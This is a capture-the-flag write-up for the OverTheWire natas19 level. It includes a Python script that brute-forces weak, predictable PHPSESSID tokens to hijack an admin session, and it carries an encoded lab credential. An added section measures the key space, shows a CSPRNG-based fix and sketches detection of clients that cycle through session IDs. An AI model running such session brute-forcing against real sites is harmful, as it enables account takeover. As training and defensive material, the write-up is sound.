If no change was made to make the ID space larger, the token can still be brute-forced.
First, let's make a request:
Using Burp's Sequencer, you can see how much entropy is in the session ID tokens assigned by the server:
(note: the PHPSESSID value in this picture is incorrect and from an older run)
After running it for a while, it looks like there's still only 6 bits of entropy! That should easily be brute-forceable.
Looking through the tokens, the last characters of each token are always constant, and they are padded in front with 0-3 values between "31" and "39".
With this in mind, I wrote a quick python script to brute force the token:
import itertools
import requests

# Candidate prefix values: nothing, or one of "31".."39".
# (Python 3 needs list() here: map() returns an iterator, so [""] + map(...) raises TypeError.)
character_space = [""] + list(map(str, range(31, 40)))
constant_tail = "2d61646d696e"
url = "http://natas19.natas.labs.overthewire.org/index.php"
payload = {"username": "admin", "password": "admin"}

# Three slots, each empty or a two-digit value, followed by the constant tail.
for x in itertools.product(character_space, repeat=3):
    token = "".join(x) + constant_tail
    headers = {
        "Cookie": "PHPSESSID={0}".format(token),
        "Authorization": "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==",
    }
    print("trying {0}...".format(token))
    r = requests.post(url, params=payload, headers=headers)
    if "You are logged in as a regular user" in r.text:
        print("fail")
    else:
        print(r.text)
        break  # first token that is not a regular-user session
After letting it run for a while, it eventually works!
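To put numbers on why this works, and what the fix and the detection look like, here is an added example (my code, not the author's script or natas19's source). It reconstructs the token scheme exactly as the post describes it (0-3 values from "31" to "39" in front of the constant tail, which is an assumption made here), enumerates the whole key space, contrasts it with a CSPRNG-backed session ID, and flags a client that cycles through many PHPSESSID values in a constructed log sample:

```python
import itertools
import math
import re
import secrets
from collections import defaultdict

# Reconstruction of the scheme the write-up describes (assumption made here,
# not natas19's actual implementation): 0-3 values "31".."39", then a constant tail.
PREFIX_ALPHABET = [str(n) for n in range(31, 40)]
CONSTANT_TAIL = "2d61646d696e"


def weak_token_space():
    """Every distinct token the described scheme can produce."""
    tokens = set()
    for length in range(4):  # 0, 1, 2 or 3 prefix values
        for combo in itertools.product(PREFIX_ALPHABET, repeat=length):
            tokens.add("".join(combo) + CONSTANT_TAIL)
    return tokens


def keyspace_bits(n_tokens):
    """Upper bound on token entropy if every token were equally likely."""
    return math.log2(n_tokens)


def expected_guesses(n_tokens):
    """Average number of guesses needed to hit one valid token out of n."""
    return (n_tokens + 1) / 2


def strong_session_id(n_bytes=16):
    """Hardened replacement: 128 bits from the OS CSPRNG, hex-encoded."""
    return secrets.token_hex(n_bytes)


# Detection side: a guessing loop presents many different PHPSESSID values
# from one client. Constructed sample log lines (not real server logs):
SAMPLE_LOG = """\
10.0.0.5 GET /index.php PHPSESSID=31312d61646d696e 200
10.0.0.5 GET /index.php PHPSESSID=31322d61646d696e 200
10.0.0.5 GET /index.php PHPSESSID=31332d61646d696e 200
10.0.0.5 GET /index.php PHPSESSID=31342d61646d696e 200
10.0.0.9 GET /index.php PHPSESSID=9c3f1a7e2b5d4c8a1f6e0d2b7a9c4e13 200
10.0.0.9 GET /index.php PHPSESSID=9c3f1a7e2b5d4c8a1f6e0d2b7a9c4e13 200
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) \S+ \S+ PHPSESSID=(?P<sid>[0-9a-f]+) \d+$")


def session_cyclers(log_text, threshold=3):
    """Return clients that presented at least `threshold` distinct session IDs."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            seen[m.group("ip")].add(m.group("sid"))
    return sorted(ip for ip, sids in seen.items() if len(sids) >= threshold)


if __name__ == "__main__":
    n = len(weak_token_space())
    print(f"described scheme: {n} possible tokens, {keyspace_bits(n):.2f} bits, "
          f"~{expected_guesses(n):.0f} guesses on average")
    print(f"secrets.token_hex(16): {keyspace_bits(16 ** 32):.0f} bits, e.g. {strong_session_id()}")
    print("clients cycling session IDs:", session_cyclers(SAMPLE_LOG))
```

The enumeration shows the structure makes the whole space (820 tokens here) trivially walkable, while a 32-hex-character `secrets.token_hex` value sits at 128 bits. On the server side, one client presenting a stream of distinct session cookies against the same page within a short window is the signal to alert on; the threshold and time window are tuning choices for the deployment.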